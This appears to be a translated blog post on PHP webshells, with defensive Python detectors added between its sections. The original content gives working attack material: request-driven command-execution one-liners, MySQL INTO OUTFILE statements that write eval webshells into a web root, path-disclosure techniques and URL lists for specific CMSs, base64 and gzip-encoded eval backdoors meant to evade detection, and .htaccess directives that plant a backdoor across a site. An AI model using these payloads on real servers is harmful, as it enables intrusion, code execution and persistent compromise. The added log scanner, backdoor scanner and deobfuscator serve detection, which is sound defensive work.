To use a shell through the PHP back end, you need to know the physical path of the PHP web root. The following article explains how to disclose that path.

Preface:
I have recently been learning PHP code auditing. I recommend this book: Code Auditing: Enterprise-level Web Code Security Architecture, by Yin Yi.
The previous article covered code execution; this one covers command execution.
Command execution means running operating system commands, on Windows or Linux.
PHP has several functions that can execute system commands. I have roughly divided them into two categories: those that return the execution result and those that do not.

Functions that return the execution result
Pass the command in directly and the function returns (or prints) its output.

system($_GET['cmd']);
//Prints the command output directly

echo exec($_GET['cmd']);
//Executes the command given by the parameter (exec() returns only the last line of output)

passthru($_GET['cmd']);
//Executes the external program and displays its raw output

echo shell_exec($_GET['cmd']);
//Executes the command through the shell and returns the complete output as a string

echo `$_GET['cmd']`;
//Backticks also execute the command; internally they call shell_exec()

Functions that do not return the execution result
These return a file or process pointer rather than the output, but the command still runs.

popen($_GET['cmd'], 'w');   //'r' and 'w' select read or write mode for the pipe
popen('whoami >> D:/2.txt', 'r');   //Redirects the command's output into a file

$proc = proc_open($_GET['cmd'], array(), $pipes);   //proc_open() needs a descriptor spec and a $pipes variable; with an empty spec the child inherits the server's stdio
Command execution tips
1. During command execution you may run into spaces being stripped or replaced.
On Windows, = can stand in for a space:

$cmd="type=../1.txt";
system($cmd);

On Linux, < can stand in for a space:

$cmd="cat<../2.txt";
system($cmd);

2. You may also need to run several commands in one call.
On Windows:
& is a continuation operator: the following command runs whether or not the preceding one succeeded.
&& runs the following command only if the preceding one succeeded.

$cmd="ipconfig&whoami";
system($cmd);

On Linux:
the semicolon ; is the continuation operator joining the statements to run

$cmd="ifconfig;whoami;";
system($cmd);
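As an added example (not code from the original post), here is a small Python detector that takes the two tips above from the defender's side: instead of looking for spaces, it URL-decodes each query parameter in a web access log and flags the shell metacharacters that chain commands or stand in for a space. The log lines are constructed for this example; the patterns and function names are this example's own.

```python
"""Flag request parameters carrying shell metacharacters, over constructed access-log lines."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# What the tips above rely on: '&', '&&', ';' and '|' chain commands, '<' and '>' redirect
# ('<' doubling as a space substitute on Linux), backticks and $( ) substitute a command,
# and a CR/LF starts a new shell line. A filter that only strips spaces misses all of these.
META = re.compile(r"&&|\|\||\$\(|[;&|<>`\n\r]")

# Apache combined-log request line: client, two dashes, [timestamp], "METHOD target PROTO".
REQUEST = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')


def suspicious_params(target):
    """Return [(name, decoded value, [metacharacters])] for the query string of a request target."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)  # a second decode pass catches double-encoded payloads
        found = sorted(set(META.findall(decoded)))
        if found:
            hits.append((name, decoded, found))
    return hits


def scan_log(lines):
    """Return [(client ip, target, hits)] for every log line with a suspicious parameter."""
    alerts = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        hits = suspicious_params(m.group("target"))
        if hits:
            alerts.append((m.group("ip"), m.group("target"), hits))
    return alerts


# Constructed sample log: one ordinary request, then the page's three tricks, URL-encoded
# as a browser or tool would send them ('&' and ';' must be encoded or they split the query).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=149 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /test.php?cmd=ipconfig%26whoami HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /test.php?cmd=cat%3C../2.txt HTTP/1.1" 200 300',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /test.php?cmd=ifconfig%3Bwhoami%3B HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, target)
        for name, value, found in hits:
            print(f"  {name}={value!r} metacharacters={found}")
```

The detector deliberately reports on decoded values, so the `%26`/`%3C`/`%3B` encodings an attacker must use to get these characters past the query-string parser are no protection; the same applies to a second layer of percent-encoding.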
Precautions
PHP has its own command-injection prevention functions, escapeshellcmd() and escapeshellarg().
escapeshellcmd() escapes the whole command string.
escapeshellarg() makes sure a value passed into a command-execution function is treated as a single string argument.
Note that using escapeshellcmd() and escapeshellarg() together causes special characters to be escaped twice.

==================================================================


Method one:

CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL);

INSERT INTO `mysql`.`xiaoma` (`xiaoma1`) VALUES ('<?php @eval($_POST[xiaoma])?>');

SELECT `xiaoma1` FROM `mysql`.`xiaoma` INTO OUTFILE 'E:/wamp/www/7.php';

---- Run the three statements together: they create a table named xiaoma in the mysql database with the field xiaoma1, and export it to E:/wamp/www/7.php

One-line shell connection password: xiaoma

Method two:

CREATE TABLE xiaoma (xiaoma1 TEXT NOT NULL);

INSERT INTO xiaoma (xiaoma1) VALUES ('<?php eval($_POST[xiaoma])?>');

SELECT xiaoma1 FROM xiaoma INTO OUTFILE 'E:/wamp/www/7.php';

DROP TABLE IF EXISTS xiaoma;

Method three:

Read a file's contents: select load_file('E:/xamp/www/s.php');

Write a one-line shell: select '<?php @eval($_POST[cmd])?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

Command execution: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

Method four:

select load_file('E:/xamp/www/xiaoma.php');

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'

Then visit the file in the website directory: http://www.xxxx.com/xiaoma.php?cmd=dir

PHP path disclosure methods:

1. Path disclosure via a single quote

Explanation:

Append a single quote to the URL parameter. This requires that single quotes are not filtered (magic_quotes_gpc = off) and that the server returns error messages by default.

www.xxx.com/news.php?id=149'

2. Path disclosure via an invalid parameter value

Explanation:

Change the submitted parameter value to an invalid one, such as -1; try -99999 when single quotes are filtered.

www.xxx.com/researcharchive.php?id=-1

3. Path disclosure via Google

Explanation:

Use keywords together with the site: operator to search for cached copies of error pages. Common keywords are warning and fatal error. Note that if the target is a second-level domain, searching its top-level domain as well turns up much more information.

site:xxx.edu.tw warning

site:xxx.com.tw "fatal error"

4. Path disclosure via test files

Explanation:

Many websites have test files in the web root, and the script code is usually phpinfo().

www.xxx.com/test.php

www.xxx.com/ceshi.php

www.xxx.com/info.php

www.xxx.com/phpinfo.php

www.xxx.com/php_info.php

www.xxx.com/1.php

5. Path disclosure via phpmyadmin

Explanation:

Once you find the phpmyadmin management page, accessing certain files in that directory very likely exposes the physical path. To find the phpmyadmin address you can scan with a tool such as wwwscan, or use Google. PS: on some sites the directory is spelled phpMyAdmin.

1. /phpmyadmin/libraries/lect_lang.lib.php

2. /phpMyAdmin/index.php?lang[]=1

3. /phpMyAdmin/phpinfo.php

4. load_file()

5. /phpmyadmin/themes/darkblue_orange/layout.inc.php

6. /phpmyadmin/libraries/select_lang.lib.php

7. /phpmyadmin/libraries/lect_lang.lib.php

8. /phpmyadmin/libraries/mcrypt.lib.php

6. Find the path in configuration files

Explanation:

If the injection point has file-read permission, you can use load_file manually or a tool to read the configuration files and find the path information in them (usually near the end of the file). The default locations of the web server and PHP configuration files on each platform can be looked up online; here are some common ones.

Windows:

c:\windows\php.ini php configuration file

c:\windows\system32\inetsrv\MetaBase.xml IIS virtual host configuration file

Linux:

/etc/php.ini php configuration file

/etc/httpd/conf.d/php.conf

/etc/httpd/conf/httpd.conf Apache configuration file

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache/conf/extra/httpd-vhosts.conf virtual directory configuration file

7. Path disclosure via the nginx file-type parsing bug

Explanation:

This method was discovered by accident yesterday. It requires that the web server is nginx and has the file-type parsing vulnerability. Sometimes appending /x.php to an image address not only causes the image to be executed as a PHP file, but also reveals the physical path.

www.xxx.com/top.jpg/x.php
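Added example, not part of the original article: a Python scan over HTTP response bodies that finds the same leaks methods 1 to 7 rely on (PHP warning and fatal error messages that name the script's filesystem path, and phpinfo() rows such as DOCUMENT_ROOT) and derives the web root from them. This is the check a site owner runs against their own responses to confirm that error display is off and that test files are gone. The response bodies are constructed; the patterns and function names are this example's own.

```python
"""Spot physical-path leaks in PHP responses (constructed samples, not from the article)."""
import re

# A PHP error message naming the script: "... in <b>E:\wamp\www\news.php</b> on line <b>12</b>"
# in HTML form, or "... in /var/www/html/x.php on line 3" in plain/log form.
ERROR_LEAK = re.compile(
    r'\bin\s+(?:<b>)?(?P<path>(?:[A-Za-z]:[\\/]|/)[^<>\s"]+?)(?:</b>)?\s+on\s+line\s+(?:<b>)?\d+')

# phpinfo() rows that print paths; DOCUMENT_ROOT is the web root itself.
PHPINFO_LEAK = re.compile(
    r'(?P<key>DOCUMENT_ROOT|SCRIPT_FILENAME)(?:[^<]|<[^>]*>)*?(?P<path>(?:[A-Za-z]:[\\/]|/)[^<>\s"]+)')


def leaked_paths(body):
    """Return [(kind, path)]: kind is 'error' for a PHP error message, else the phpinfo() key."""
    leaks = [("error", m.group("path")) for m in ERROR_LEAK.finditer(body)]
    leaks += [(m.group("key"), m.group("path")) for m in PHPINFO_LEAK.finditer(body)]
    return leaks


def infer_web_root(url_path, kind, path):
    """DOCUMENT_ROOT is the web root; for a script path, strip the request's URL path from
    the end of the filesystem path. Returns None when the two do not line up."""
    norm = path.replace("\\", "/").rstrip("/")
    if kind == "DOCUMENT_ROOT":
        return norm
    script = url_path.split("?", 1)[0]
    if script and norm.lower().endswith(script.lower()):
        return norm[: len(norm) - len(script)] or "/"
    return None


def scan_responses(responses):
    """responses: [(url_path, body)] -> [(url_path, kind, leaked path, inferred web root)]."""
    report = []
    for url_path, body in responses:
        for kind, path in leaked_paths(body):
            report.append((url_path, kind, path, infer_web_root(url_path, kind, path)))
    return report


# Constructed responses: a single-quote error (method 1), an invalid-id error in plain form
# (method 2), a phpinfo() test page (method 4), and a clean page.
SAMPLES = [
    ("/news.php?id=149'",
     "<br />\n<b>Warning</b>:  mysql_fetch_array() expects parameter 1 to be resource, "
     "boolean given in <b>E:\\wamp\\www\\news.php</b> on line <b>12</b><br />\n"),
    ("/researcharchive.php?id=-1",
     "PHP Fatal error:  Call to undefined function foo() in /var/www/html/researcharchive.php on line 3\n"),
    ("/phpinfo.php",
     '<tr><td class="e">DOCUMENT_ROOT </td><td class="v">E:/wamp/www </td></tr>\n'),
    ("/index.php", "<html><body>Welcome</body></html>\n"),
]

if __name__ == "__main__":
    for url_path, kind, path, root in scan_responses(SAMPLES):
        print(f"{url_path}: {kind} leaks {path} (web root: {root})")
```

Run over a crawl of your own site, any non-empty report means the php.ini display_errors setting is still on, or a phpinfo() test file is still reachable; the inferred web root is exactly the value the INTO OUTFILE methods above need, which is why the leak matters.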

8. Others

dedecms

/member/templets/menulit.php

plus/paycenter/alipay/return_url.php

plus/paycenter/cbpayment/autoreceive.php

paycenter/nps/config_pay_nps.php

plus/task/dede-maketimehtml.php

plus/task/dede-optimize-table.php

plus/task/dede-upcache.php

WP

wp-admin/includes/file.php

wp-content/themes/baiaogu-seo/footer.php

ecshop mall system: files that disclose the path

/api/cron.php

/wap/goods.php

/temp/compiled/ur_here.lbi.php

/temp/compiled/pages.lbi.php

/temp/compiled/user_transaction.dwt.php

/temp/compiled/history.lbi.php

/temp/compiled/page_footer.lbi.php

/temp/compiled/goods.dwt.php

/temp/compiled/user_clips.dwt.php

/temp/compiled/goods_article.lbi.php

/temp/compiled/comments_list.lbi.php

/temp/compiled/recommend_promotion.lbi.php

/temp/compiled/search.dwt.php

/temp/compiled/category_tree.lbi.php

/temp/compiled/user_passport.dwt.php

/temp/compiled/promotion_info.lbi.php

/temp/compiled/user_menu.lbi.php

/temp/compiled/message.dwt.php

/temp/compiled/admin/pagefooter.htm.php

/temp/compiled/admin/page.htm.php

/temp/compiled/admin/start.htm.php

/temp/compiled/admin/goods_search.htm.php

/temp/compiled/admin/index.htm.php

/temp/compiled/admin/order_list.htm.php

/temp/compiled/admin/menu.htm.php

/temp/compiled/admin/login.htm.php

/temp/compiled/admin/message.htm.php

/temp/compiled/admin/goods_list.htm.php

/temp/compiled/admin/pageheader.htm.php

/temp/compiled/admin/top.htm.php

/temp/compiled/top10.lbi.php

/temp/compiled/member_info.lbi.php

/temp/compiled/bought_goods.lbi.php

/temp/compiled/goods_related.lbi.php

/temp/compiled/page_header.lbi.php

/temp/compiled/goods_script.html.php

/temp/compiled/index.dwt.php

/temp/compiled/goods_fittings.lbi.php

/temp/compiled/myship.dwt.php

/temp/compiled/brands.lbi.php

/temp/compiled/help.lbi.php

/temp/compiled/goods_gallery.lbi.php

/temp/compiled/comments.lbi.php

/temp/compiled/myship.lbi.php

/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php

/includes/modules/cron/auto_manage.php

/includes/modules/cron/ipdel.php

ucenter path disclosure

ucenter\control\admin\db.php

DZbbs

manyou/admincp.php?my_suffix=%0A%0DTOBY57

z-blog

admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php

php168 path disclosure

admin/inc/hack/count.php?job=list

admin/inc/hack/search.php?job=getcode

admin/inc/ajax/bencandy.php?job=do

cache/MysqlTime.txt

PHPcms2008-sp4

Accessible after logging in as a registered user

phpcms/corpandresize/process.php?pic=../images/logo.gif

bo-blog

PoC:

/go.php/<[evil code]

CMSeasy website path disclosure vulnerability

The vulnerability is in the file menu_top.php

lib/mods/celive/menu_top.php

/lib/default/ballot_act.php

lib/default/special_act.php
 

===========================================================

The functions commonly used by PHP backdoor Trojans can be roughly divided into four categories:

1. Executing system commands: system, passthru, shell_exec, exec, popen, proc_open

2. Code execution and encoding: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

3. File inclusion and generation: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
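The four categories above map directly onto static detection rules. The Python scanner below is an added example (not from the original article): it flags each listed function when its argument list reaches a request superglobal, eval/assert fed by one of the listed decoders, the $_GET[a](...) variable-function form, the backtick operator, and the three .htaccess directives. The sample PHP file and .htaccess are constructed to mirror the snippets on this page; the rule set and function names are this example's own.

```python
"""Flag the backdoor-style constructs listed above in PHP source and .htaccess (constructed samples)."""
import re

# A request superglobal being indexed, e.g. $_GET[cmd] or $_POST['cmd'].
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["

# Sinks from categories 1-3, each flagged only when its argument list reaches a superglobal.
SINKS = {
    "command": ["system", "passthru", "shell_exec", "exec", "popen", "proc_open"],
    "code": ["eval", "assert", "call_user_func", "create_function"],
    "file": ["require", "require_once", "include", "include_once",
             "file_get_contents", "file_put_contents", "fputs", "fwrite"],
}
DECODERS = ["base64_decode", "gzinflate", "gzuncompress", "gzdecode", "str_rot13"]

RULES = [
    (category, re.compile(r"\b(?:%s)\s*\([^;]*?%s" % ("|".join(names), SUPERGLOBAL)))
    for category, names in SINKS.items()
]
RULES += [
    # eval/assert fed by a decoder chain: the encoded one-liners of category 2
    ("code", re.compile(r"\b(?:eval|assert)\s*\(\s*(?:%s)\s*\(" % "|".join(DECODERS))),
    # variable function call, $_GET[a](...)
    ("code", re.compile(r"%s[^\]]*\]\s*\(" % SUPERGLOBAL)),
    # backtick operator around request data (shell_exec in disguise)
    ("command", re.compile(r"`[^`\n]*%s" % SUPERGLOBAL)),
    # category 4: .htaccess directives that turn a non-.php file into executable PHP
    ("htaccess", re.compile(r"^\s*(?:SetHandler\s+application/x-httpd-php|"
                            r"php_value\s+auto_(?:prepend|append)_file\b).*$",
                            re.IGNORECASE | re.MULTILINE)),
]


def scan(text, kind="php"):
    """Return sorted [(line number, category, matched snippet)]; kind is 'php' or 'htaccess'."""
    hits = []
    for category, pattern in RULES:
        if (category == "htaccess") != (kind == "htaccess"):
            continue
        for m in pattern.finditer(text):
            line_no = text.count("\n", 0, m.start()) + 1
            hits.append((line_no, category, m.group(0).strip()))
    return sorted(hits)


# Constructed sample file: two harmless lines (2 and 11) among the page's one-liners.
SAMPLE_PHP = """<?php
$id = (int) $_GET['id'];
system($_GET[cmd]);
echo `$_GET['cmd']`;
$arr = array(); exec($_GET[cmd], $arr);
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
call_user_func('assert', $_POST[cmd]);
$_GET[a]($_REQUEST[cmd]);
include($_GET[file]);
file_put_contents($_GET[a], $_GET[b]);
echo htmlspecialchars($_GET['name']);
"""

# Constructed sample .htaccess carrying two of the three directives.
SAMPLE_HTACCESS = """# constructed sample
SetHandler application/x-httpd-php
php_value auto_prepend_file c:/apache2/htdocs/123.gif
"""

if __name__ == "__main__":
    for line_no, category, snippet in scan(SAMPLE_PHP) + scan(SAMPLE_HTACCESS, kind="htaccess"):
        print(f"line {line_no:>2} [{category}] {snippet}")
```

The rules are a triage aid, not a proof of compromise: line 2 and line 11 of the sample show that a superglobal on its own is not flagged, only one that reaches a listed sink in the same statement, and a reviewer still has to read each hit.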

1. Executing system commands:

system function
//test.php?cmd=ls
system($_GET[cmd]);

passthru function
//test.php?cmd=ls
passthru($_GET[cmd]);

shell_exec function
//test.php?cmd=ls
echo shell_exec($_GET[cmd]);

exec function
//test.php?cmd=ls
$arr = array();
exec($_GET[cmd], $arr);
print_r($arr);

popen function
//test.php?cmd=ls
$handle = popen($_GET[cmd], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);

proc_open function
//test.php?cmd=ls
$descriptorspec = array(
    0 => array('pipe', 'r'),
    1 => array('pipe', 'w'),
    2 => array('pipe', 'w'),
);
$proc = @proc_open($_GET[cmd], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1], 1024), "\n"));
print_r($output);

2. Code execution and encoding:

eval function
//The most common one-line Trojan
eval($_POST[cmd]);

base64_decode function
//Encode the code to evade detection and hide it
//Decodes to: eval($_POST['cmd']);
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

gzinflate function
//Encode the code to evade detection and hide it
//Decodes to: eval($_POST['cmd']);
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));

gzuncompress function
//Encode the code to evade detection and hide it
//Decodes to: eval($_POST['cmd']);
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));

gzdecode function
//Encode the code to evade detection and hide it
//Decodes to: eval($_POST['cmd']);
eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));

str_rot13 function
//Encode the code to evade detection and hide it
//Decodes to: eval($_POST[cmd]);
eval(str_rot13('riny($_CBFG[pzq]);'));
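For the encoded one-liners above, the decoding an analyst performs on a suspect file can be automated. The Python below is an added example (not code from the article): it parses the eval(wrapper(...('literal'))) shape, applies the inverse of each listed wrapper from the inside out (base64, raw DEFLATE for gzinflate, zlib for gzuncompress, gzip for gzdecode, rot13), and repeats until the payload is plain PHP. The inputs are the five samples quoted in this section plus one constructed two-layer sample; the function names are this example's own, and the gzip fallback assumes a header with no optional fields.

```python
"""Peel the encoding layers off an obfuscated PHP one-liner (samples quoted from the page)."""
import base64
import codecs
import re
import zlib

# Outermost call: name(arg) with an optional trailing ';'. arg may itself be a call or a literal.
CALL = re.compile(r"^\s*(?P<fn>\w+)\s*\((?P<arg>.*)\)\s*;?\s*$", re.DOTALL)
LITERAL = re.compile(r"^\s*(?P<q>['\"])(?P<s>.*)(?P=q)\s*$", re.DOTALL)


def _inflate_raw(data):
    """Inverse of gzinflate(): a raw DEFLATE stream with no header."""
    return zlib.decompressobj(-zlib.MAX_WBITS).decompress(data)


def _gzdecode(data):
    """Inverse of gzdecode(): a gzip container. If the trailer is damaged (a sample copied
    from a blog can lose its CRC), fall back to inflating the body after the 10-byte header
    (assumption: no optional header fields)."""
    try:
        return zlib.decompressobj(16 + zlib.MAX_WBITS).decompress(data)
    except zlib.error:
        return _inflate_raw(data[10:])


# Inverse of each wrapper the section lists; bytes in, bytes out.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": _inflate_raw,
    "gzuncompress": zlib.decompress,  # zlib container (header + Adler-32)
    "gzdecode": _gzdecode,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
}
SINKS = {"eval", "assert", "create_function"}


def decode_once(php):
    """Strip one sink(wrapper(...(literal))) shell; return (sink, decoded payload, wrappers
    outer-to-inner), or None if the code is not in that shape."""
    m = CALL.match(php)
    if not m or m.group("fn") not in SINKS:
        return None
    expr, wrappers = m.group("arg"), []
    while not LITERAL.match(expr):
        call = CALL.match(expr)
        if not call or call.group("fn") not in DECODERS:
            return None  # argument is a variable or an unknown function: nothing to peel
        wrappers.append(call.group("fn"))
        expr = call.group("arg")
    if not wrappers:
        return None  # a plain string literal went straight to the sink
    data = LITERAL.match(expr).group("s").encode("latin-1")
    for fn in reversed(wrappers):  # innermost wrapper decodes first
        data = DECODERS[fn](data)
    return m.group("fn"), data.decode("latin-1"), wrappers


def peel(php, max_depth=10):
    """Decode repeatedly until the payload is plain PHP. Returns (plaintext, trail) where
    trail lists (sink, wrappers) per layer removed; an empty trail means nothing was encoded."""
    trail = []
    for _ in range(max_depth):
        step = decode_once(php)
        if step is None:
            break
        sink, php, wrappers = step
        trail.append((sink, wrappers))
    return php, trail


# The five encoded one-liners quoted in the section above, keyed by their outer wrapper.
PAGE_SAMPLES = {
    "base64_decode": "eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));",
    "gzinflate": "eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));",
    "gzuncompress": "eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));",
    "gzdecode": "eval(gzdecode(base64_decode('H4sIAAAAAAAAA0stS8zRUIkP8A8OiVZPzk1Rj9W0BgA5YQfAFAAAAA==')));",
    "str_rot13": "eval(str_rot13('riny($_CBFG[pzq]);'));",
}
# A constructed two-layer sample: the rot13 one-liner wrapped once more in base64.
NESTED_SAMPLE = "eval(base64_decode('%s'));" % base64.b64encode(
    PAGE_SAMPLES["str_rot13"].encode()).decode()

if __name__ == "__main__":
    for name, sample in list(PAGE_SAMPLES.items()) + [("nested", NESTED_SAMPLE)]:
        plaintext, trail = peel(sample)
        print(f"{name:>13}: {plaintext!r}  via {trail}")
```

Every sample on the page decodes to the same eval($_POST[...]) one-liner, which is the practical point: the wrappers change the bytes on disk, so a signature on the plaintext misses them, but a detector that decodes the wrappers first (or that simply flags eval fed by base64_decode/gzinflate/str_rot13) catches all of them at once.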

assert function
//Similar to the eval function
assert($_POST[cmd]);

call_user_func function
//Use call_user_func to call assert
call_user_func('assert', $_POST[cmd]);

call_user_func function
//Use call_user_func to call any function
//test.php?a=assert&cmd=phpinfo()
call_user_func($_GET[a], $_REQUEST[cmd]);

Variable function call
//Call any function by combining two parameters
//test.php?a=assert&cmd=phpinfo()
$_GET[a]($_REQUEST[cmd]);

3. File inclusion and generation:

require function
//Include any file
//test.php?file=123.jpg
require($_GET[file]);

require_once function
//Include any file
//test.php?file=123.jpg
require_once($_GET[file]);

include function
//Include any file
//test.php?file=123.jpg
include($_GET[file]);

include_once function
//Include any file
//test.php?file=123.jpg
include_once($_GET[file]);

file_get_contents function
//Read any file
//test.php?f=config.inc.php
echo file_get_contents($_GET['f']);

file_put_contents function
//Write a file with arbitrary content
//a=test.php&b=
file_put_contents($_GET[a], $_GET[b]);

fputs function
//Write a file with arbitrary content
//a=test.php&b=
fputs(fopen($_GET[a], "w"), $_GET[b]);

4. .htaccess:

SetHandler
//The PHP code can be stored in a file without a .php suffix, for example x.jpg
//Write the following line into .htaccess
//Requesting x.jpg then runs the backdoor Trojan
SetHandler application/x-httpd-php

auto_prepend_file
//The PHP code can be stored in a file without a .php suffix, for example 123.gif
//Write the following line into .htaccess; the file path must be absolute
//Requesting any PHP file on the site then runs the PHP backdoor Trojan
//This can record every $_REQUEST value without changing the site's source code, and can plant the backdoor across the site at once
php_value auto_prepend_file c:/apache2/htdocs/123.gif

auto_append_file
//Similar to auto_prepend_file
//The PHP code can be stored in a file without a .php suffix, for example 123.gif
//Write the following line into .htaccess; the file path must be absolute
//Requesting any PHP file on the site then runs the PHP backdoor Trojan
php_value auto_append_file c:/apache2/htdocs/123.gif


Origin blog.csdn.net/davice_li/article/details/131802725